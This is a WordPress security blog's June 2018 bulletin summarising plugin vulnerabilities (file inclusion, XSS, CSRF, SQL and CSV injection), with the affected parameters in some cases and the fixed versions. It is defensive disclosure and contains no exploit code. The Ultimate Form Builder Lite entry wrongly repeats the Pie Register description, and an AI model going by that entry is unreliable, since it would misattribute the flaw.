Scroll Top

WP Security: 11 plugin vulnerabilities in June 2018

By Csaba, Miklós WP Security WP SERVICES 3 July 2018

WP SECURITY: 11 PLUGIN VULNERABILITIES IN JUNE 2018

For your WP Security, be informed about the latest vulnerabilities in WordPress plugins:

  1. Redirection
    • Authenticated Local File Inclusion reported by Ryan (Dewhurst Security). ACE via file inclusion in Redirection allows admins to execute any PHP file in the filesystem. If you are logged in as an administrator on any site by using the setup page for the redirection plugin you can run arbitrary code and completely compromise the system. The software uses the external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
      • immediately upgrade to version 2.8 to fix the vulnerability
  2. Tooltipy (tooltips for WP)
    • Unauthenticated Cross-Site Scripting (XSS) reported by Ryan (Dewhurst Security). Reflected XSS in Tooltipy (tooltips for WP) could allow anybody to do almost anything an admin can. Tootipy contains reflected XSS in the [kttg_glossary] shortcode meaning that admin users’ browsers can be hijacked by anybody who sends them a link. The hijacked browser can be made to do almost anything an admin user can normally do. The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
    • Cross-Site Request Forgery (CSRF) reported by Ryan (Dewhurst Security). CSRF in Tooltipy (tooltips for WP) could allow anybody to duplicate posts. There is a CSRF vulnerability in Tooltipy’s “KTTG Converter” feature which allows anybody able to convince an admin to follow a link to duplicate posts. The PoC provided below allows duplicating every post with post_type post. The most obvious malicious use of this vulnerability would be to fill up a disk or database quota which might lead to denial of service or other issues.
      • immediately upgrade to version 5.1 to fix both vulnerabilities
  3. Pie Register
    • Authenticated Blind SQL Injection reported by Ryan (Dewhurst Security). SQL injection vulnerability in the Pie Register plugin before 3.0.10 for WordPress allows remote attackers to execute arbitrary SQL commands via the invitation codes grid.
      • immediately upgrade to version 3.0.10 to fix the vulnerability

    4. Our only security is our ability to change. ~ John Lilly

    WP Security
  4. Ultimate Form Builder Lite
    • Multiple Vulnerabilities reported by Ryan (Dewhurst Security). SQL injection vulnerability in the Pie Register plugin before 3.0.10 for WordPress allows remote attackers to execute arbitrary SQL commands via the invitation codes grid. The Cross-Site Scripting vulnerability can enable the attacker to construct the URL that contains malicious JavaScript code. If the administrator of the site makes a request to such an URL, the attacker’s code will be executed, with unrestricted access to the WordPress site in question.
      • immediately upgrade to version 1.3.8 to fix the vulnerability
      • Consider owl CONTACTS as a more secure replacement candidate.
  5. Advanced Order Export For WooCommerce
    • CSV Injection reported by Ryan (Dewhurst Security). The plugin “Advanced Order Export For WooCommerce” for WordPress (v1.5.4 and before) is vulnerable to CSV Injection.
      • immediately upgrade to version 1.5.5 to fix the vulnerability
  6. WordPress Comments Import & Export
    • CSV Injection reported by Ryan (Dewhurst Security). The plugin “WordPress Comments Import & Export” for WordPress (v2.0.4 and before) is vulnerable to CSV Injection.
      • immediately upgrade to version 2.0.5 to fix the vulnerability

    7. At the end of the day, the goals are simple: safety and security. ~ Jodi Rell

    WP Security
  7. Open Graph for Facebook, Google+ and Twitter Card Tags
    • Authenticated Reflected XSS reported by hakluke . There is a reflected XSS vulnerability caused by “Open Graph for Facebook, Google+ and Twitter Card Tags” in the wd_fb_og_error parameter on a GET request when editing a post. This can be exploited by tricking an authenticated WordPress administrator into clicking a malicious link.
      • immediately upgrade to version 2.2.4.1 to fix the vulnerability
  8. iThemes Security
    • Authenticated SQL Injection reported by Çlirim Emini https://www.sentry.co.com/. The iThemes Security (better-wp-security) plugin before 7.0.3 for WordPress allows SQL Injection (by attackers with Admin privileges) via the logs page. iThemes Security appears to be vulnerable to time-based SQL-Injection. The parameter “orderby” is vulnerable because backend variable $sort_by_column is not escaped. Privileges required: Admin user.
      • immediately upgrade to version 7.0.3 to fix the vulnerability
  9. Email Subscribers & Newsletters
    • Cross-Site Scripting (XSS) reported by Ryan (Dewhurst Security). Cross-site scripting vulnerability in Email Subscribers & Newsletters versions prior to 3.5.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
      • immediately upgrade to version 3.5.0 to fix the vulnerability
  10. Site Reviews
    • Cross-Site Scripting (XSS) reported by Ryan (Dewhurst Security). Cross-site scripting vulnerability in Site Reviews versions prior to 2.15.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
      • immediately upgrade to version 2.15.3 to fix the vulnerability

Protect your WordPress: BEFORE IT’S TOO LATE! You will also protect your customers, your reputation and your online business!

WP Security

Related Posts

WP SECURITY
WP Security: 3 theme vulnerabilities in May 2019

WP Security bulletin – May 2019 At your next scheduled WordPress Maintenance, be advised for your WP Security about the latest 3 vulnerabilities in a premium WordPress theme identified and reported publicly in May 2019. As these vulnerabilities are disclosed, when you use one (or more) of these outdated themes…

17 Jun 2019
WORDPRESS LOGO
two WordPress Security and Maintenance Releases, versions 4.9.4 + 4.9.3

On 6 February, 2018, WordPress 4.9.4 was released to the public. This maintenance release fixes a severe bug in 4.9.3, which will cause sites that support automatic background updates to fail to update automatically, and will require manual action to be updated to 4.9.4. We strongly encourage you to update…

12 Feb 2018
DIGITAL RISKS
New DIGITAL RISKS emerge against online businesses

More and more businesses are embracing cloud services to improve employee collaboration, streamline operations and engage customers. With these new benefits come with new risks for WordPress Security, including accidental sharing, credential theft and unsafe third-party app add-ons. These are the top trends: • From all successful login attempts to…

02 Aug 2018
THEMES VULNERABILITY 2022
WP Theme CVE JUN 2024: 27 Premium Hack risk
13 Jun 2024
WP SECURITY
WP Vulnerability DEC 2022 Centralised Abuse Highlights
26 Dec 2022
WORDPRESS LOGO
WordPress 4.9.1 Security and Maintenance Release

WordPress 4.9.1 is now available. This is a security and maintenance release for all versions since WordPress 3.7. WordPress versions 4.9 and earlier are affected by 4 security issues which could potentially be exploited as part of a multi-vector attack. As part of the core team’s ongoing commitment to security…

02 Dec 2017
WP SECURITY
WP Security: 6 plugin vulnerabilities in OCT 2018

WP Security bulletin – OCTOBER 2018 At your next scheduled WordPress Maintenance, be advised for your WP Security about the latest 6 vulnerabilities in WordPress plugins identified and reported publicly during. As these vulnerabilities are disclosed, when you use one (or more) of these outdated plugins – your risking serious…

31 Oct 2018
WP SECURITY
WP Vulnerability AUG 2022 Centralised Abuse Highlights
17 Aug 2022
WP SECURITY
WP Security: 5 plugin vulnerabilities in July 2018

At your next scheduled WordPress Maintenance, be advised for your WordPress protection about the latest vulnerabilities in WordPress plugins identified and reported publicly this month: Open Graph for Facebook, Google+ and Twitter Card Tags Unauthenticated Cross-Site Scripting (XSS) reported by Thomas Chauchefoin. The software does not neutralize or incorrectly neutralizes…

06 Aug 2018
WP SECURITY
WordPress Core Vulnerability February 2018

For your WordPress protection, be informed about the latest WordPress Core vulnerability IS STILL UNPATCHED since it’s first official report January 29, 2018 or it’s official disclosure date: Monday, February 5, 2018. All versions of WordPress starting with the latest 4.9.4 and below have the Application Denial of Service (DoS)…

01 Mar 2018
WP CORE VULNERABILITY 2022
9 bug fixes in WP Core Vulnerability MAY 2022: Caution
12 May 2022
THEMES VULNERABILITY 2022
WP Theme CVE NOV 2023: 11 Premium Hack risk
06 Nov 2023
WP SECURITY
WP Vulnerability NOV 2022 Centralised Abuse Highlights
24 Nov 2022
WP CORE VULNERABILITY 2022
3 WP Core Vulnerability APR 2022: Critical Caution
13 Apr 2022
SECURITY ISSUES
5 Typical WordPress Security Issues [infographic]

5 Typical WordPress Security Issues If you own a WordPress-powered website or are thinking about utilising WordPress as your CMS, you may be worried about potential WordPress Security problems. In this post, we’ll show a few of the most typical WP security vulnerabilities, in addition to actions you can require…

01 Apr 2019
owlpower.eu
owlpower.eu
owlpower.eu
16+ years of owlsome experience
We're on an empowering mission for website owners, who desire not to be transformed forcefully into IT experts.